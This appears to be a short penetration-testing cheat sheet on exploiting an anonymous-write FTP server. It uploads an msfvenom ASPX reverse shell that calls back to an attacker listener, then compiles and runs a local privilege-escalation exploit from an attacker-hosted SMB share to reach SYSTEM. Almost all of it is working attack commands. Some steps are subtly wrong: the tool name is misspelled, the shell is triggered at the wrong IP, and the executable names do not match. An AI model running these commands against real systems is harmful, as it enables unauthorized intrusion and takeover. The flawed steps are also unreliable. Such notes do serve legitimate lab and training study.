FTP Anonymous

#Try to upload file to FTP

Nano test.txt

#Logon details

ftp 10.0.0.1 username = anonymous password anything

#Test upload

put test.txt

#Upload reverse shell

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.0.0.2 LPORT=4444 -o reverse.aspx

ftp 10.0.0.1

put reverse.aspx

#Listener

nc -nlvp 4444

#Execute reverse shell

http://10.0.0.2/reverse.aspx

#Reccy the victim

systeminfo

#Download exploit as .c

searchploit -m 40564

#Compile C to EXE

apt-get install mingw-w64 i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

#Smbserver via Impacket

cd /Downloads/impacket-0.9.23/examples

#Smbshare from kali

sudo smbserver.py share /home/user/downloads/ftp

#On victim (don't download as it wont exe in dos, exe across the network)

\\10.0.0.2\share\405642.exe

whoami

System

PreviousFTPNextMeterpreter

Last updated